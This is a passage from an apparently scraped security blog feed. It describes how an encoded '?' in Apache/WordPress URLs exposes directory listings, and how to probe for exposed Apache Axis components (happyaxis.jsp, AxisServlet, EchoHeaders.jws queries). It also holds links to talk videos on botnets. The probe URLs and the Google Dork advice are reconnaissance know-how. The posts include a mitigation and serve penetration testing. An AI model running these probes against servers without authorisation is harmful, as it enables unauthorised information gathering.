<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEippukAlDWoG7Zd6x-Im3ndcHyGQBHLlZevk1y0cjRWafQNXjHbzA3DPuzOGT-IoD7uSeEq-4K-I9DMIiHlGpjPU9kHBoVcAmLVaIh4dmO_pDl3RKmQ4zkVdbDxL3CDc2JuX9-VAw/s1600/apache_2_wordpress_dir_listing_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEippukAlDWoG7Zd6x-Im3ndcHyGQBHLlZevk1y0cjRWafQNXjHbzA3DPuzOGT-IoD7uSeEq-4K-I9DMIiHlGpjPU9kHBoVcAmLVaIh4dmO_pDl3RKmQ4zkVdbDxL3CDc2JuX9-VAw/s640/apache_2_wordpress_dir_listing_3.png" width="640" /></a></div>
<div>
<b><br /></b></div>
<div>
<br /></div>
<div>
This allowed me to get the listing of the<b> /blog/</b> directory which really helped me to understand the presence of different files on the remote web server. But, If I used the payload as: <b><a href="http://www.example.com/blog/?page_id=34">http://www.example.com/blog/?page_id=34</a> </b>without encoding, it did not work. So the encoding of "<b>?" character</b> resulted in failure of processing the request as desired by the Apache web server thereby resulting in directory listing.</div>
<div>
<br /></div>
<div>
Let's have a look at the HTTP response headers:</div>
<div>
<br /></div>
<div>
Request 1: <b><a href="http://www.example.com/blog/%3Fpage_id=34">http://www.example.com/blog/%3Fpage_id=34</a>.</b></div>
<div>
<div class="MsoNormal">
(Status-Line) HTTP/1.1
200 OK<br />
Date Sun, 20 Jan 2013 19:22:59 GMT<br />
Server VHFFS / Apache/1.3.34 (Unix)
mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b
mod_chroot/0.5<br />
Content-Type text/html;
charset=ISO-8859-1<br />
Transfer-Encoding chunked</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Request 2: <b><a href="http://www.example.com/blog/?page_id=34">http://www.example.com/blog/?page_id=34</a></b></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
(Status-Line) HTTP/1.1
200 OK<br />
Date Sun, 20 Jan 2013 19:23:48 GMT<br />
Server VHFFS / Apache/1.3.34 (Unix)
mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b
mod_chroot/0.5<br />
<b>
X-Powered-By PHP/5.1.5 with
Hardening-Patch</b><br />
Content-Type text/html;
charset=ISO-8859-1<br />
Transfer-Encoding chunked</div>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
In the request 2, the response contains X-Powered-By as compared to the first request. So, the PHP preprocessor plays a part in it.</div>
</div>
<div>
<b><br /></b></div>
<div>
<b>Constraint: </b>In this technique, one can only get the directory listing but will no be able to access those files</div>
<div>
until unless there is misconfiguration issue.</div>
<div>
<br /></div>
<div>
<b>Background: </b>I forced Google to provide me with related information and I got the related links as follows:</div>
<div>
<br /></div>
<div>
1. <a href="http://stackoverflow.com/questions/9786853/apache-not-processing-encoded-urls-with-3f">http://stackoverflow.com/questions/9786853/apache-not-processing-encoded-urls-with-3f</a></div>
<div>
2. <a href="https://issues.apache.org/bugzilla/show_bug.cgi?id=34602">https://issues.apache.org/bugzilla/show_bug.cgi?id=34602</a></div>
<div>
<br /></div>
<div>
<b>Solution:</b> Configure appropriate rewrite rules using mod_rewrite to prevent these types of vulnerabilities.</div>
<div>
Check [1] for this</div>
<div>
<br /></div>
<div>
Note: If any reader has a specific view on this, please respond back. </div>
</div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-68060511289102522702013-01-20T10:37:00.001-08:002013-01-27T21:23:26.254-08:00DEFCON 20 Talk : Botnets Die Hard : Owned and Operated Video<center>
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/dBIfIwKfhw8" width="420"></iframe></center>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-6721930668698559672012-11-12T19:27:00.001-08:002012-11-12T19:27:51.893-08:00GrrCon 2012 Talk - The Realm of Third Generation Botnet Attacks<center>
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/adrfBJH7v6o" width="560"></iframe></center>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-42076587153264670812012-10-31T14:49:00.000-07:002012-10-31T14:49:59.183-07:00(Pentest Apache #1) Exposed Apache Axis - SOAP ObjectsRecently, I was doing some open research. On compromising the Tomcat Apache Manager component, I came across Apache Axis.<br />
<br />
<span style="font-family: Georgia, 'Times New Roman', serif;"><b><span style="color: #fff2cc;"><i><span style="font-size: 15px; line-height: 22.549999237060547px; text-align: justify;">Apache Axis2™ is a Web Services / SOAP / WSDL engine, the successor to the widely used </span><a class="externalLink" href="http://ws.apache.org/axis/" style="background-image: none; font-size: 15px; line-height: 22.549999237060547px; padding: 0px; text-align: justify; text-decoration: none;"><span style="color: #fff2cc;">Apache Axis</span></a><span style="font-size: 15px; line-height: 22.549999237060547px; text-align: justify;"> SOAP stack. There are two implementations of the Apache Axis2 Web services engine - Apache Axis2/Java and Apache Axis2/C</span></i></span></b></span><br />
<i style="font-family: Georgia, 'Times New Roman', serif;"><span style="color: #333333; font-size: 15px; line-height: 22.549999237060547px; text-align: justify;"><br /></span></i>
Fore more information about Apache Axis, refer here :<br />
<br />
<ul>
<li><b><a href="http://axis.apache.org/axis2/java/core/"><span style="color: orange;">http://axis.apache.org/axis2/java/core/</span></a></b></li>
<li><b><span style="color: orange;"><b>http://axis.apache.org/axis/</b><span style="font-weight: normal;"> </span></span></b></li>
</ul>
<br />
It is highly advised that while conducting penetration tests (web + network), one should dig deeper to find exposed Apache Axis objects on the target servers. Primarily, misconfigured Apache web servers (Tomcat) results in exposed SOAP objects used for implementing Apache Axis services engine.<br />
<br />
What to look for?<br />
<br />
1. <b>Default happyaxis.jsp:</b> This file provides plethora of information about the configured web services on the target server. It leverages configuration as follows:<br />
<br />
<ul>
<li>Examining web application configuration (Needed + Optional Configuration)</li>
<li>Examining application server</li>
<li>Examining system properties</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikP-A6PzTkG-gWpcyfGmUTLNPJek_amC4HXVQDJGvFpSXlpn1tbByvyzMMwOQB2S8AKKNfvNODHMZBuuSGxB3YqqMLO2YjFDEj7QvW3bPW5ImrXuGT5YD2zzla0jkM8CDpJPxC7w/s1600/axis_happiness.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikP-A6PzTkG-gWpcyfGmUTLNPJek_amC4HXVQDJGvFpSXlpn1tbByvyzMMwOQB2S8AKKNfvNODHMZBuuSGxB3YqqMLO2YjFDEj7QvW3bPW5ImrXuGT5YD2zzla0jkM8CDpJPxC7w/s400/axis_happiness.png" width="400" /></a></div>
<br />
<br />
2. <b>Axis Servlet (/servlet/AxisServlet):</b> It leverages information about the deployed web services on the<br />
target server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVFcNBsL5EHdMfcFeXAb1IgK6s7_Ek2CIPcL_tctToW_h5xHwhFb3IZXW-IlFSCOoezIkOI-k0IRuTpyC8rFx4I028QDYY6u77FNs1N3RfPbzC2bRKy2wC9iZDpBlFKXiFyS_AWg/s1600/axis_servlet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVFcNBsL5EHdMfcFeXAb1IgK6s7_Ek2CIPcL_tctToW_h5xHwhFb3IZXW-IlFSCOoezIkOI-k0IRuTpyC8rFx4I028QDYY6u77FNs1N3RfPbzC2bRKy2wC9iZDpBlFKXiFyS_AWg/s320/axis_servlet.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: start;">
<b>3. Echo Headers (/EchoHeaders.jws): </b>This component calls the local endpoints to reveal HTTP headers.</div>
<div style="text-align: start;">
<span style="color: #222222; font-family: arial, sans-serif; font-size: x-small;"><span style="line-height: 16px;">For more information about JWS file, refer: </span></span><a href="http://docs.oracle.com/cd/E13226_01/workshop/docs70/help/guide/devenv/conJwsFiles.html" style="text-align: center;"><b style="text-align: center;"><span style="color: orange;">http://docs.oracle.com/cd/E13226_01/workshop/docs70/help/guide/devenv/conJwsFiles.htm</span></b><span style="text-align: center;">l</span></a></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
3.1 If method name is not specified (<b><span style="color: orange;">EchoHeaders.jws?method=</span></b>), it results in exception as follows:</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggUNN051IeXkdlx2PmWqpLVakvCjRFg8G_EeASGaURlL5oIBU9gzCL05NkNOAj55GB57ZU8rZE52eiZT2zitj4lSOljOasPUotWQb5uNsRr8hq4kie6FpY5ttb8FCSjfwXOZDuEA/s1600/axis_http_header_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggUNN051IeXkdlx2PmWqpLVakvCjRFg8G_EeASGaURlL5oIBU9gzCL05NkNOAj55GB57ZU8rZE52eiZT2zitj4lSOljOasPUotWQb5uNsRr8hq4kie6FpY5ttb8FCSjfwXOZDuEA/s400/axis_http_header_1.png" width="400" /></a></div>
<div style="text-align: start;">
3.2 If method name is specified (<b><span style="color: orange;">EchoHeaders.jws?method=list</span></b>), it provides results as follows:</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNtNEWWzZ3cAPjQU6edsvDiJlDEhBuRBXhlFSSuqUpZb5qwg6PM8jMCWvNPZC7BnvCekKvX9FVXWpTWalZLD7yzhlR3wynzh8GMeV_z_KUY5jJaoU5DILCVBULzPm-6yvYsz5sng/s1600/axis_http_header_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNtNEWWzZ3cAPjQU6edsvDiJlDEhBuRBXhlFSSuqUpZb5qwg6PM8jMCWvNPZC7BnvCekKvX9FVXWpTWalZLD7yzhlR3wynzh8GMeV_z_KUY5jJaoU5DILCVBULzPm-6yvYsz5sng/s400/axis_http_header_2.png" width="400" /></a></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
3.3 Call WSDL directory (<b><span style="color: orange;">EchoHeaders.jws?wsdl</span>)</b> it provides results as follows:</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifKQ8wnq3EOe-WWe8eKKQ19QWg0UkjtmhPMQlr1K2vobYnpQ14BpJmIFjv9PUz4MDQ1wLe7NHmllecpDfD7uV6aQ325c9yTOJxv4YUCplKbbulWszHUIU9bKku9MyltPYnZcDMJg/s1600/axis_http_header_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifKQ8wnq3EOe-WWe8eKKQ19QWg0UkjtmhPMQlr1K2vobYnpQ14BpJmIFjv9PUz4MDQ1wLe7NHmllecpDfD7uV6aQ325c9yTOJxv4YUCplKbbulWszHUIU9bKku9MyltPYnZcDMJg/s400/axis_http_header_3.png" width="400" /></a></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
4. Traverse the exposed <b><span style="color: orange;">WSDL Endpoints</span></b> listed by the <b>Axis Servlet (/servlet/AxisServlet).</b></div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxCIRqXRkolHeC9i1pwn8btTQJ_HpuzWWczp8OcL1pHT8VW9q3uDWXGk-rWtnXXwovE2NX_hXffz3ggKRTrLjxnyA3rik8tDig8RnjtrYfBpcBhMs3y_doQ3VaDpgbKcv-e7u_g/s1600/axis_exposed_wsdl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxCIRqXRkolHeC9i1pwn8btTQJ_HpuzWWczp8OcL1pHT8VW9q3uDWXGk-rWtnXXwovE2NX_hXffz3ggKRTrLjxnyA3rik8tDig8RnjtrYfBpcBhMs3y_doQ3VaDpgbKcv-e7u_g/s400/axis_exposed_wsdl.png" width="400" /></a></div>
<div style="text-align: start;">
<b><br /></b></div>
<div style="text-align: start;">
By default, Administer Axis and SOAP Monitor component is disabled. But, the above presented information still helps the attacker to get the configuration of the target server.</div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
So use Google Dorks, analyze manually by provided information in this blog to detect exposed Apache Axis SOAP objects.</div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
Enjoy!</div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-80643601455370580412012-07-01T08:07:00.001-07:002012-09-10T04:25:53.300-07:00Art of InfoJacking Talk at Source Seattle - 2011<iframe allowfullscreen="" frameborder="0" height="334" src="http://blip.tv/play/AYLO3goC.html?p=1" width="596"></iframe><embed src="http://a.blip.tv/api.swf#AYLO3goC" style="display: none;" type="application/x-shockwave-flash"></embed><br />
<br />
My talk at Source Seattle 2011.<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-5520527045179037342012-07-01T07:55:00.001-07:002012-07-01T07:57:02.927-07:00LayerOne 2012 Talk - Mangling with Botnets<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/CqjkUehv9xo?feature=player_embedded' frameborder='0'></iframe></div>
<br />
My talk at LayerOne 2012 conference.<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0